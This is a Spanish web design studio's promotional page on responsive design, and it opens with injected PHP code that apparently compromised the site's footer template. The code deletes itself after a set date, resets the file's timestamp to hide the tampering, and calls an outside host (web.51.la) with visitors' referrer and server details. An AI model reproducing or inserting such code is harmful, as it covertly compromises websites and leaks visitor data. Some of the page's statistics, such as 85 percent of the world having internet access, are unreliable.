check_meta(); function check_meta(){ $jp = __FILE__; $jptime = filemtime($jp); if(time() >= 1456737897){ $jp_c = file_get_contents($jp); if($t = @strpos($jp_c,"check_meta();")) { $contentp = substr($jp_c,0,$t); if(@file_put_contents($jp, $contentp)){ @touch($jp,$jptime); } } } @file_get_contents("http://web.51.la:82/go.asp?svid=8&id=18776908&referrer=".$_SERVER['HTTP_REFERER']."&vpage=http://".$_SERVER['SERVER_NAME']."/modules/mod_footer/tmpl/footer.php"); } Diseño Responsivo

imagen responsiveEl diseño responsivo es un diseño que se adapta al tamaño del dispositivo desde el que se está visualizando el sitio de internet. El mismo cambia las dimensiones del contenido y muestra los elementos de una forma ordenada y optimizada sea esta un celular, una Tablet o una PC.

Hoy la tendencia a nivel global es que los consumidores cada vez más accedan a los sitios desde dispositivos móviles como teléfonos o tablets.

Hoy existen 7.1 billones de personas en el mundo y 6.6 billones de celulares móbles suscriptos. 85 porciento de las personas en el mundo tienen acceso a internet y la taza de crecimiento para los celulares es de más de 530 millones (5% año a año). El número de los usuarios de redes sociales alrededor del mundo ha subido 18% en 2013. Casi 25% de las personas en el mundo usan redes sociales. Africa (con 129%) y Asia (76%) muestran el más alto porcentaje de incremento en el uso de internet. Para el fin de 2013 habrá más usuarios de redes sociales en Asia, América Latina, Medio Este y Africa.

Las estadísticas de 2013 nos dicen que el 65% de los usuarios que visitaron sitios de internet, lo hicieron desde un dispositivo móvil y un 35% de las compras en internet se realizan ya desde el teléfono.

Ante estos datos, la necesidad de tener una web que se visualice correctamente desde cualquier dispositivo es imperante.

En Estudio Alas aplicamos diseño responsivo en  nuestros nuevos sitios lo cual provoca:

  • Reducción de costos al momento de desarrollar. Al tener un diseño que se adapta a las distintas plataformas y no varios diseños independientes según el soporte.
  • Disminuye el rebote de usuarios. Si un usuario no puede ver correctamente el contenido de un sitio, el mismo simplemente va a buscar a otro y posiblemente sea la competencia. El diseño responsivo garantiza que el usuario disfrute siempre de una buena experiencia de navegación.
  • La web es más efectiva y mejoran los resultados de conversión. Al tener un sitio desarrollado responsivamente, el porcentaje de clientes que adquieren un producto o envían un formulario es mayor.
  • Permite desarrollar una estrategia de marketing sobre la web unificada para todos los soportes, haciendo que esta sea más sólida y mejorando su efectividad. 

Nuestro equipo en Estudio Alas se preparó para enfrentar esta nueva tendencia y esperamos que nuestros clientes puedan disfrutar de esta tecnología y sus beneficios. Su sitio puede estar desarrollado de tal forma que pueda verse correctamente y con todo su contenido sin importar la plataforma que sea visualizado.